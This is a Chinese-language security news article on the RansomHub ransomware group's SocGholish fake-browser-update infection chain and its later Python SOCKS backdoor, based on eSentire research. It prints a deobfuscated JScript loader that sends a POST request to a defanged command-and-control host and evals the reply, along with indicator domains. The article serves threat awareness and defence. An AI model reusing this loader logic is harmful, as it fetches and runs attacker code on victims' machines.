關(guān)鍵詞

網(wǎng)絡(luò)攻擊

網(wǎng)絡(luò)犯罪生態(tài)系統(tǒng)中出現(xiàn)了一個名為 RansomHub 的新型勒索軟件即服務(wù) (RaaS) 組織，專門通過復(fù)雜的攻擊媒介針對知名組織。

該組織在俄羅斯匿名市場（RAMP）上宣傳其犯罪服務(wù)，RAMP 是一個臭名昭著的暗網(wǎng)論壇，以舉辦各種網(wǎng)絡(luò)犯罪活動而聞名。

RansomHub 通過其多階段攻擊方法和規(guī)避技術(shù)迅速成為全球企業(yè)網(wǎng)絡(luò)的巨大威脅。

該勒索軟件組織通過部署 SocGholish（也稱為 FakeUpdates）惡意軟件作為初始訪問向量來運作，然后在部署基于 python 的后門之前收集詳細的系統(tǒng)信息。

這種偵察活動使威脅行為者能夠戰(zhàn)略性地評估潛在受害者，使他們能夠?qū)⒕性诟邇r值目標上，同時有效地逃避安全研究人員和沙盒環(huán)境。

Esentire 的威脅響應(yīng)部門 (TRU)在 2025 年 3 月初使用此方法發(fā)現(xiàn)了一次重大網(wǎng)絡(luò)攻擊。

研究人員指出，RansomHub 附屬機構(gòu)在最初的攻擊后會策略性地選擇目標，從第一次接觸命令和控制服務(wù)器到交付 Python 后門大約間隔 6.5 分鐘。

感染鏈

感染鏈始于受害者訪問受感染的 WordPress 網(wǎng)站，該網(wǎng)站會顯示一個頁面，指示受害者更新瀏覽器。

下載惡意“Update.zip”文件后，用戶會在不知不覺中執(zhí)行 SocGholish JScript 文件，從而啟動與攻擊者的命令和控制基礎(chǔ)設(shè)施的通信。

感染機制采用復(fù)雜的多階段方法，其中每個組件在攻擊鏈中都有特定的用途。

感染鏈（來源 – Esentire）

初始訪問發(fā)生在受害者訪問受感染網(wǎng)站（在記錄的案例中為“butterflywonderland[.]com”）并被提示更新 Microsoft Edge 時。

下載的“Update.zip”包含“Update.js”，這是一個JScript文件，它向“hxxps://exclusive.nobogoods[.]com/updateStatus”的 SocGholish C2 服務(wù)器發(fā)送 POST 請求，以檢索攻擊的下一階段。

初始階段的反混淆代碼揭示了惡意軟件如何建立持久性：

var a0_0x11d8eb = new ActiveXObject("MSXML2.XMLHTTP");
a0_0x11d8eb.open("POST", "https://exclusive.nobogoods[.]com/profileLayout", true);
a0_0x11d8eb.send("m29Q00a/f6CPLnKzgumo/nA1jnhP0S5dlEw1uB21Cw==");
while (true) {
    WSH.Sleep(0x3e8);
    if (a0_0x11d8eb.readyState == 0x4) {
        eval(a0_0x11d8eb.responseText);
        break;
    }
}

收集系統(tǒng)信息后，惡意軟件會執(zhí)行“net use”和“systeminfo”等 LOLBin 命令來收集有關(guān)受感染環(huán)境的更多情報。

收集到的數(shù)據(jù)經(jīng)過編碼并傳回命令和控制服務(wù)器，然后確定受害者是否是有價值的目標。

對于選定的目標，攻擊者會部署一個 python 后門，建立SOCKS 代理，允許威脅行為者在受害者的整個網(wǎng)絡(luò)中進行偵察和橫向移動。

安全圈

網(wǎng)羅圈內(nèi)熱點 專注網(wǎng)絡(luò)安全

實時資訊一手掌握！

好看你就分享 有用就點個贊

支持「安全圈」就點個三連吧！